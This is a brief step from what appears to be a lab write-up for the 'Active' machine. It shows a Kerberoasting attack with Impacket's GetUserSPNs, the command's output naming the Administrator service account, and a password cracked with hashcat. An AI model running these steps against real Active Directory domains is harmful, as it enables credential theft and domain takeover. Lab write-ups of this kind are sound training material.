25-Impacket-GetUserSPNs
I’ll use the GetUserSPNs script from Impacket to get a list of service usernames which are associated with normal user accounts. It will also get a ticket that I can crack.
➜ Active impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile userSpns.out
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2024-01-11 00:55:39.534151
[-] CCache file is not found. Skipping...
I got the administrator hash, and then cracked it with hashcat.
administrator:Ticketmaster1968